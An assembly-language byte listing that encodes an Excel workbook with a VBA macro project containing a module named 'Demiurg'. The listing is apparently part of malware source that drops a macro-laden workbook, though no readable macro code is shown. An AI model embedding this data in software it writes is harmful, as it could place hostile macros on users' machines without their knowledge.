db 000h, 000h, 002h, 000h, 000h, 000h, 003h, 000h
db 000h, 000h, 004h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 006h, 000h, 000h, 000h, 007h, 000h
db 000h, 000h, 008h, 000h, 000h, 000h, 009h, 000h
db 000h, 000h, 00Ah, 000h, 000h, 000h, 00Bh, 000h
db 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh, 000h
db 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh, 000h
db 000h, 000h, 010h, 000h, 000h, 000h, 011h, 000h
db 000h, 000h, 012h, 000h, 000h, 000h, 013h, 000h
db 000h, 000h, 014h, 000h, 000h, 000h, 015h, 000h
db 000h, 000h, 016h, 000h, 000h, 000h, 017h, 000h
db 000h, 000h, 018h, 000h, 000h, 000h, 019h, 000h
db 000h, 000h, 01Ah, 000h, 000h, 000h, 01Bh, 000h
db 000h, 000h, 01Ch, 000h, 000h, 000h, 01Dh, 000h
db 000h, 000h, 01Eh, 000h, 000h, 000h, 01Fh, 000h
db 000h, 000h, 020h, 000h, 000h, 000h, 021h, 000h
db 000h, 000h, 022h, 000h, 000h, 000h, 023h, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 025h, 000h
db 000h, 000h, 026h, 000h, 000h, 000h, 027h, 000h
db 000h, 000h, 028h, 000h, 000h, 000h, 029h, 000h
db 000h, 000h, 02Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 02Ch, 000h, 000h, 000h, 02Dh, 000h
db 000h, 000h, 02Eh, 000h, 000h, 000h, 02Fh, 000h
db 000h, 000h, 030h, 000h, 000h, 000h, 031h, 000h
db 000h, 000h, 032h, 000h, 000h, 000h, 033h, 000h
db 000h, 000h, 034h, 000h, 000h, 000h, 035h, 000h
db 000h, 000h, 036h, 000h, 000h, 000h, 037h, 000h
db 000h, 000h, 038h, 000h, 000h, 000h, 039h, 000h
db 000h, 000h, 03Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 03Ch, 000h, 000h, 000h, 03Dh, 000h
db 000h, 000h, 03Eh, 000h, 000h, 000h, 03Fh, 000h
db 000h, 000h, 040h, 000h, 000h, 000h, 041h, 000h
db 000h, 000h, 042h, 000h, 000h, 000h, 043h, 000h
db 000h, 000h, 044h, 000h, 000h, 000h, 045h, 000h
db 000h, 000h, 046h, 000h, 000h, 000h, 047h, 000h
db 000h, 000h, 048h, 000h, 000h, 000h, 049h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 04Bh, 000h
db 000h, 000h, 04Ch, 000h, 000h, 000h, 04Dh, 000h
db 000h, 000h, 04Eh, 000h, 000h, 000h, 04Fh, 000h
db 000h, 000h, 050h, 000h, 000h, 000h, 051h, 000h
db 000h, 000h, 052h, 000h, 000h, 000h, 053h, 000h
db 000h, 000h, 054h, 000h, 000h, 000h, 055h, 000h
db 000h, 000h, 056h, 000h, 000h, 000h, 057h, 000h
db 000h, 000h, 058h, 000h, 000h, 000h, 059h, 000h
db 000h, 000h, 05Ah, 000h, 000h, 000h, 05Bh, 000h
db 000h, 000h, 05Ch, 000h, 000h, 000h, 05Dh, 000h
db 000h, 000h, 05Eh, 000h, 000h, 000h, 05Fh, 000h
db 000h, 000h, 060h, 000h, 000h, 000h, 061h, 000h
db 000h, 000h, 062h, 000h, 000h, 000h, 063h, 000h
db 000h, 000h, 064h, 000h, 000h, 000h, 065h, 000h
db 000h, 000h, 066h, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 068h, 000h, 000h, 000h, 069h, 000h
db 000h, 000h, 06Ah, 000h, 000h, 000h, 06Bh, 000h
db 000h, 000h, 06Ch, 000h, 000h, 000h, 06Dh, 000h
db 000h, 000h, 06Eh, 000h, 000h, 000h, 06Fh, 000h
db 000h, 000h, 070h, 000h, 000h, 000h, 071h, 000h
db 000h, 000h, 072h, 000h, 000h, 000h, 073h, 000h
db 000h, 000h, 074h, 000h, 000h, 000h, 075h, 000h
db 000h, 000h, 076h, 000h, 000h, 000h, 077h, 000h
db 000h, 000h, 078h, 000h, 000h, 000h, 079h, 000h
db 000h, 000h, 07Ah, 000h, 000h, 000h, 07Bh, 000h
db 000h, 000h, 07Ch, 000h, 000h, 000h, 07Dh, 000h
db 000h, 000h, 07Eh, 000h, 000h, 000h, 07Fh, 000h
db 000h, 000h, 080h, 000h, 000h, 000h, 009h, 008h
db 010h, 000h, 000h, 006h, 005h, 000h, 0D3h, 010h
db 0CCh, 007h, 041h, 000h, 000h, 000h, 006h, 000h
db 000h, 000h, 0E1h, 000h, 002h, 000h, 0B0h, 004h
db 0C1h, 000h, 002h, 000h, 000h, 000h, 0E2h, 000h
db 000h, 000h, 05Ch, 000h, 070h, 000h, 001h, 000h
db 000h, 042h, 0E6h, 06Ch, 020h, 042h, 000h, 002h
db 000h, 0B0h, 004h, 061h, 001h, 002h, 000h, 000h
db 000h, 03Dh, 001h, 002h, 000h, 001h, 000h, 0D3h
db 000h, 000h, 000h, 0BAh, 001h, 014h, 000h, 011h
db 000h, 000h, 044h, 069h, 065h, 073h, 065h, 041h
db 072h, 062h, 065h, 069h, 074h, 073h, 06Dh, 061h
db 070h, 070h, 065h, 09Ch, 000h, 002h, 000h, 00Eh
db 000h, 019h, 000h, 002h, 000h, 000h, 000h, 012h
db 000h, 002h, 000h, 000h, 000h, 013h, 000h, 002h
db 000h, 000h, 000h, 0AFh, 001h, 002h, 000h, 000h
db 000h, 0BCh, 001h, 002h, 000h, 000h, 000h, 03Dh
db 000h, 012h, 000h, 0F0h, 000h, 087h, 000h, 0DCh
db 023h, 094h, 011h, 039h, 0E6h, 005h, 000h, 001h
db 000h, 058h, 002h, 040h, 000h, 002h, 000h, 000h
db 000h, 08Dh, 000h, 002h, 000h, 000h, 000h, 022h
db 000h, 002h, 000h, 000h, 000h, 00Eh, 000h, 002h
db 000h, 001h, 000h, 0B7h, 001h, 002h, 000h, 000h
db 000h, 0DAh, 000h, 002h, 000h, 000h, 000h, 031h
db 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h, 0FFh
db 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h, 001h
db 041h, 000h, 072h, 000h, 069h, 000h, 061h, 000h
db 06Ch, 000h, 031h, 000h, 01Ah, 000h, 0C8h, 000h
db 000h, 000h, 0FFh, 07Fh, 090h, 001h, 0E6h, 006h
db 000h, 005h, 001h, 041h, 000h, 072h, 000h, 069h
db 000h, 061h, 000h, 06Ch, 000h, 031h, 000h, 01Ah
db 000h, 0C8h, 000h, 000h, 000h, 0FFh, 07Fh, 090h
db 001h, 0E6h, 006h, 000h, 005h, 001h, 041h, 000h
db 072h, 000h, 069h, 000h, 061h, 000h, 06Ch, 000h
db 031h, 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h
db 0FFh, 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h
db 001h, 041h, 000h, 072h, 000h, 069h, 000h, 061h
db 000h, 06Ch, 000h, 01Eh, 004h, 01Eh, 000h, 005h
db 000h, 019h, 000h, 000h, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h, 03Bh
db 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h
db 023h, 02Ch, 023h, 023h, 030h, 01Eh, 004h, 023h
db 000h, 006h, 000h, 01Eh, 000h, 000h, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 03Bh, 05Bh, 052h, 065h, 064h, 05Dh, 05Ch
db 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h, 023h
db 02Ch, 023h, 023h, 030h, 01Eh, 004h, 024h, 000h
db 007h, 000h, 01Fh, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 02Eh, 030h, 030h, 01Eh, 004h, 029h, 000h
db 008h, 000h, 024h, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Bh, 052h, 065h, 064h
db 05Dh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 01Eh, 004h, 03Eh, 000h, 02Ah, 000h, 039h
db 000h, 000h, 05Fh, 02Dh, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 02Ch, 000h, 029h
db 000h, 027h, 000h, 000h, 05Fh, 02Dh, 02Ah, 020h
db 023h, 02Ch, 023h, 023h, 030h, 05Fh, 02Dh, 03Bh
db 05Ch, 02Dh, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 046h, 000h, 02Ch
db 000h, 041h, 000h, 000h, 05Fh, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 02Eh, 030h, 030h, 05Fh, 02Dh
db 03Bh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 01Eh, 004h, 034h
db 000h, 02Bh, 000h, 02Fh, 000h, 000h, 05Fh, 02Dh
db 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh
db 030h, 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 02Ah
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 0E6h, 00Bh
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 000h, 001h, 000h, 000h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 000h, 002h, 000h, 000h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h
db 002h, 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h
db 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 001h
db 000h, 020h, 0E6h, 00Bh, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 000h, 001h, 000h, 02Bh, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h, 000h
db 029h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F8h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 000h, 001h, 000h, 009h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F8h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 000h, 001h, 000h, 02Ch, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 02Ah, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F8h, 0E6h, 008h, 000h, 0C0h, 020h, 093h, 002h
db 004h, 000h, 010h, 080h, 003h, 0FFh, 093h, 002h
db 004h, 000h, 011h, 080h, 006h, 0FFh, 093h, 002h
db 004h, 000h, 012h, 080h, 005h, 0FFh, 093h, 002h
db 004h, 000h, 000h, 080h, 000h, 0FFh, 093h, 002h
db 004h, 000h, 013h, 080h, 004h, 0FFh, 093h, 002h
db 004h, 000h, 014h, 080h, 007h, 0FFh, 060h, 001h
db 002h, 000h, 001h, 000h, 085h, 000h, 010h, 000h
db 086h, 009h, 0E6h, 004h, 000h, 008h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 08Ch
db 000h, 004h, 000h, 031h, 000h, 02Bh, 000h, 0FCh
db 000h, 008h, 0E6h, 009h, 000h, 0FFh, 000h, 0FAh
db 003h, 008h, 000h, 0FFh, 0FFh, 040h, 000h, 000h
db 000h, 040h, 010h, 045h, 000h, 000h, 000h, 040h
db 000h, 001h, 000h, 000h, 000h, 00Ch, 000h, 040h
db 000h, 051h, 004h, 0E6h, 00Ah, 000h, 085h, 084h
db 0F7h, 0BFh, 001h, 000h, 000h, 000h, 09Ch, 084h
db 0F7h, 0BFh, 000h, 000h, 040h, 000h, 001h, 000h
db 000h, 000h, 038h, 0C6h, 062h, 0E6h, 005h, 000h
db 001h, 0E6h, 007h, 000h, 005h, 040h, 000h, 080h
db 002h, 094h, 0F7h, 0BFh, 000h, 000h, 040h, 000h
db 004h, 000h, 000h, 000h, 0E0h, 006h, 09Ch, 000h
db 00Ah, 000h, 000h, 000h, 020h, 000h, 000h, 000h
db 0FAh, 07Eh, 070h, 030h, 00Ah, 000h, 000h, 000h
db 00Ah, 000h, 000h, 000h, 007h, 00Ch, 000h, 000h
db 001h, 000h, 000h, 000h, 0E8h, 006h, 09Ch, 000h
db 0B4h, 0C5h, 062h, 0E6h, 00Dh, 000h, 0E6h, 008h
db 0FFh, 09Ch, 030h, 075h, 0E6h, 005h, 000h, 069h
db 000h, 075h, 000h, 0FFh, 0FFh, 0FFh, 0E7h, 0E6h
db 004h, 000h, 05Ch, 000h, 063h, 000h, 005h, 000h
db 000h, 000h, 05Ch, 000h, 064h, 000h, 065h, 000h
db 06Dh, 000h, 003h, 0E6h, 007h, 000h, 028h, 0D0h
db 09Dh, 030h, 0E6h, 008h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 014h, 000h, 002h, 007h, 002h, 002h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 003h, 000h, 000h
db 000h, 070h, 000h, 07Eh, 030h, 0C3h, 07Ch, 070h
db 030h, 004h, 000h, 000h, 000h, 004h, 0E6h, 007h
db 000h, 001h, 000h, 000h, 000h, 04Eh, 087h, 075h
db 000h, 082h, 0D8h, 07Eh, 030h, 003h, 000h, 000h
db 000h, 003h, 0E6h, 00Bh, 000h, 061h, 07Ah, 070h
db 030h, 0D4h, 006h, 09Ch, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 00Ah, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 0D4h, 006h, 09Ch
db 000h, 00Ah, 0E6h, 00Bh, 000h, 028h, 0D0h, 09Dh
db 030h, 0E6h, 008h, 000h, 002h, 000h, 000h, 000h
db 0FFh, 003h, 000h, 000h, 001h, 000h, 000h, 000h
db 001h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
db 020h, 010h, 000h, 000h, 018h, 0E6h, 007h, 000h
db 084h, 0F6h, 053h, 030h, 05Ch, 0C5h, 062h, 000h
db 05Dh, 0E6h, 007h, 000h, 002h, 000h, 0C8h, 030h
db 000h, 000h, 0C5h, 030h, 0E6h, 004h, 000h, 061h
db 07Ah, 070h, 030h, 04Ch, 087h, 075h, 000h, 004h
db 000h, 000h, 000h, 07Eh, 00Eh, 002h, 002h, 0E1h
db 03Ch, 06Dh, 030h, 016h, 000h, 0C8h, 030h, 0D3h
db 000h, 000h, 000h, 09Eh, 0C5h, 062h, 000h, 0FCh
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0CDh
db 015h, 004h, 030h, 000h, 000h, 0C5h, 030h, 004h
db 02Ah, 0C8h, 030h, 039h, 015h, 000h, 030h, 007h
db 00Ch, 000h, 000h, 001h, 000h, 000h, 000h, 0D4h
db 006h, 09Ch, 000h, 00Ah, 000h, 000h, 000h, 0A0h
db 0C5h, 062h, 000h, 00Ah, 000h, 000h, 000h, 0D0h
db 006h, 09Ch, 0E6h, 005h, 000h, 0A0h, 0C7h, 062h
db 000h, 05Dh, 0E6h, 007h, 000h, 08Eh, 08Fh, 00Fh
db 030h, 0E6h, 004h, 000h, 09Ch, 0C5h, 062h, 000h
db 00Bh, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 070h
db 006h, 09Ch, 000h, 0DCh, 0C7h, 062h, 000h, 004h
db 000h, 000h, 000h, 00Bh, 000h, 057h, 000h, 0E4h
db 000h, 068h, 000h, 072h, 000h, 075h, 000h, 06Eh
db 000h, 067h, 000h, 020h, 000h, 05Bh, 000h, 030h
db 000h, 05Dh, 000h, 000h, 000h, 05Fh, 000h, 000h
db 000h, 001h, 000h, 008h, 000h, 09Ah, 00Dh, 0E6h
db 004h, 000h, 0AEh, 082h, 070h, 030h, 007h, 00Ch
db 000h, 000h, 001h, 000h, 000h, 000h, 04Ch, 087h
db 075h, 000h, 004h, 000h, 000h, 000h, 080h, 0D8h
db 07Eh, 030h, 004h, 000h, 000h, 000h, 0AEh, 082h
db 070h, 030h, 007h, 00Ch, 000h, 000h, 001h, 000h
db 000h, 000h, 064h, 000h, 098h, 000h, 002h, 000h
db 000h, 000h, 065h, 010h, 000h, 030h, 064h, 000h
db 098h, 000h, 096h, 06Ah, 054h, 030h, 004h, 000h
db 000h, 000h, 0D9h, 010h, 000h, 030h, 096h, 06Ah
db 054h, 030h, 052h, 070h, 054h, 030h, 0C2h, 0C8h
db 010h, 030h, 096h, 01Ah, 09Ah, 000h, 050h, 000h
db 098h, 000h, 065h, 010h, 000h, 030h, 050h, 000h
db 098h, 000h, 096h, 01Ah, 09Ah, 000h, 002h, 000h
db 000h, 000h, 0DDh, 088h, 00Fh, 030h, 096h, 01Ah
db 09Ah, 000h, 050h, 000h, 098h, 000h, 001h, 000h
db 000h, 000h, 060h, 01Ah, 09Ah, 0E6h, 005h, 000h
db 008h, 000h, 098h, 000h, 0FCh, 001h, 098h, 0E6h
db 009h, 000h, 0A4h, 01Ah, 09Ah, 0E6h, 00Dh, 000h
db 03Fh, 0E6h, 007h, 000h, 0B0h, 0C6h, 062h, 000h
db 039h, 086h, 00Fh, 030h, 006h, 000h, 000h, 000h
db 060h, 01Ah, 09Ah, 000h, 02Dh, 000h, 000h, 000h
db 007h, 000h, 000h, 000h, 006h, 002h, 098h, 000h
db 0DEh, 0C7h, 062h, 000h, 0DCh, 0C7h, 062h, 000h
db 008h, 000h, 098h, 000h, 007h, 000h, 000h, 000h
db 03Dh, 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h
db 0E6h, 004h, 000h, 065h, 010h, 000h, 030h, 070h
db 06Ah, 054h, 030h, 0ECh, 004h, 09Ah, 000h, 04Ch
db 000h, 000h, 000h, 0D9h, 010h, 000h, 030h, 0ECh
db 004h, 09Ah, 000h, 070h, 06Ah, 054h, 030h, 04Ch
db 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h, 0BAh
db 0C7h, 062h, 000h, 0C0h, 0C7h, 062h, 0E6h, 00Dh
db 000h, 0A2h, 0C7h, 010h, 030h, 009h, 004h, 0E6h
db 00Ah, 000h, 024h, 000h, 000h, 000h, 0FCh, 0E7h
db 062h, 000h, 0F3h, 083h, 00Fh, 030h, 04Ch, 0C7h
db 062h, 000h, 001h, 000h, 000h, 000h, 010h, 0A3h
db 09Ah, 0E6h, 009h, 000h, 0C0h, 0C7h, 062h, 0E6h
db 005h, 000h, 010h, 0A3h, 09Ah, 0E6h, 005h, 000h
db 0F4h, 0C6h, 062h, 000h, 06Eh, 083h, 00Fh, 030h
db 0E6h, 024h, 000h, 038h, 005h, 09Ch, 000h, 0DCh
db 0C7h, 062h, 000h, 014h, 000h, 000h, 000h, 0E0h
db 000h, 000h, 000h, 0A8h, 0C7h, 062h, 000h, 0FCh
db 0E7h, 062h, 0E6h, 005h, 000h, 01Ch, 0A2h, 09Ah
db 000h, 0C4h, 0C7h, 062h, 000h, 09Ah, 020h, 000h
db 030h, 01Ch, 0A2h, 09Ah, 000h, 073h, 090h, 00Ah
db 000h, 000h, 000h, 009h, 008h, 010h, 000h, 000h
db 006h, 010h, 000h, 0D3h, 010h, 0CCh, 007h, 041h
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 00Bh
db 002h, 010h, 0E6h, 00Dh, 000h, 03Eh, 00Ah, 000h
db 000h, 00Dh, 000h, 002h, 000h, 001h, 000h, 00Ch
db 000h, 002h, 000h, 064h, 000h, 00Fh, 000h, 002h
db 000h, 001h, 000h, 011h, 000h, 002h, 000h, 000h
db 000h, 010h, 000h, 008h, 000h, 0FCh, 0A9h, 0F1h
db 0D2h, 04Dh, 062h, 050h, 03Fh, 05Fh, 000h, 002h
db 000h, 001h, 000h, 02Ah, 000h, 002h, 000h, 000h
db 000h, 02Bh, 000h, 002h, 000h, 000h, 000h, 082h
db 000h, 002h, 000h, 001h, 000h, 080h, 000h, 008h
db 0E6h, 009h, 000h, 025h, 002h, 004h, 000h, 000h
db 000h, 0FFh, 000h, 081h, 000h, 002h, 000h, 0C1h
db 004h, 014h, 000h, 000h, 000h, 015h, 000h, 000h
db 000h, 083h, 000h, 002h, 000h, 000h, 000h, 084h
db 000h, 002h, 000h, 000h, 000h, 0A1h, 000h, 022h
db 000h, 000h, 000h, 0FFh, 000h, 001h, 000h, 001h
db 000h, 001h, 000h, 004h, 000h, 0DEh, 0C7h, 062h
db 000h, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 0CEh, 05Ah, 055h, 000h, 002h, 000h, 00Ah
db 000h, 000h, 002h, 00Eh, 0E6h, 00Fh, 000h, 03Eh
db 002h, 012h, 000h, 0B6h, 006h, 0E6h, 004h, 000h
db 040h, 0E6h, 00Bh, 000h, 01Dh, 000h, 00Fh, 000h
db 003h, 0E6h, 006h, 000h, 001h, 0E6h, 007h, 000h
db 0BAh, 001h, 00Bh, 000h, 008h, 000h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 00Ah
db 0E6h, 031h, 000h, 001h, 016h, 001h, 000h, 000h
db 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h, 004h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h, 000h
db 000h, 003h, 000h, 000h, 000h, 005h, 000h, 000h
db 000h, 007h, 000h, 000h, 000h, 0E6h, 008h, 0FFh
db 001h, 001h, 008h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h, 000h
db 000h, 0AFh, 002h, 000h, 000h, 0F5h, 001h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 001h
db 000h, 000h, 000h, 0B5h, 031h, 0B7h, 031h, 000h
db 000h, 0FFh, 0FFh, 023h, 000h, 000h, 000h, 088h
db 000h, 000h, 000h, 008h, 0E6h, 020h, 000h, 0FFh
db 0FFh, 000h, 000h, 0CBh, 002h, 000h, 000h, 0D6h
db 000h, 000h, 000h, 0D6h, 000h, 000h, 000h, 01Fh
db 003h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0DFh, 000h, 0FFh, 0FFh, 0E6h, 004h
db 000h, 00Ch, 000h, 0E6h, 058h, 0FFh, 044h, 000h
db 069h, 000h, 065h, 000h, 073h, 000h, 065h, 000h
db 041h, 000h, 072h, 000h, 062h, 000h, 065h, 000h
db 069h, 000h, 074h, 000h, 073h, 000h, 06Dh, 000h
db 061h, 000h, 070h, 000h, 070h, 000h, 065h, 0E6h
db 01Fh, 000h, 024h, 000h, 002h, 001h, 007h, 000h
db 000h, 000h, 0E6h, 008h, 0FFh, 0E6h, 024h, 000h
db 02Bh, 000h, 000h, 000h, 0CAh, 003h, 0E6h, 006h
db 000h, 054h, 000h, 061h, 000h, 062h, 000h, 065h
db 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h
db 0E6h, 031h, 000h, 012h, 000h, 002h, 001h, 006h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 024h, 000h, 03Bh, 000h, 000h
db 000h, 0BFh, 003h, 0E6h, 006h, 000h, 044h, 000h
db 065h, 000h, 06Dh, 000h, 069h, 000h, 075h, 000h
db 072h, 000h, 067h, 0E6h, 033h, 000h, 010h, 000h
db 002h, 001h, 008h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 024h, 000h, 04Ah, 000h, 000h, 000h
db 01Fh, 007h, 0E6h, 006h, 000h, 05Fh, 000h, 056h
db 000h, 042h, 000h, 041h, 000h, 05Fh, 000h, 050h
db 000h, 052h, 000h, 04Fh, 000h, 04Ah, 000h, 045h
db 000h, 043h, 000h, 054h, 0E6h, 029h, 000h, 01Ah
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
db 000h, 067h, 000h, 000h, 000h, 059h, 00Ch, 0E6h
db 006h, 000h, 0E6h, 028h, 0FFh, 028h, 000h, 000h
db 000h, 002h, 000h, 053h, 04Ch, 0E6h, 004h, 0FFh
db 000h, 000h, 001h, 000h, 053h, 010h, 0E6h, 004h
db 0FFh, 000h, 000h, 001h, 000h, 053h, 094h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 002h, 03Ch, 0E6h
db 004h, 0FFh, 000h, 000h, 0FFh, 0FFh, 001h, 001h
db 0E6h, 004h, 000h, 001h, 000h, 04Eh, 000h, 030h
db 000h, 07Bh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 032h, 000h, 030h, 000h, 038h, 000h, 031h
db 000h, 039h, 000h, 02Dh, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 02Dh
db 000h, 043h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 036h, 000h, 07Dh, 0E6h, 007h, 000h, 0DFh
db 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 038h, 000h, 000h, 000h, 002h, 081h, 0FEh, 0E6h
db 009h, 0FFh, 028h, 0E6h, 005h, 000h, 0FFh, 0FFh
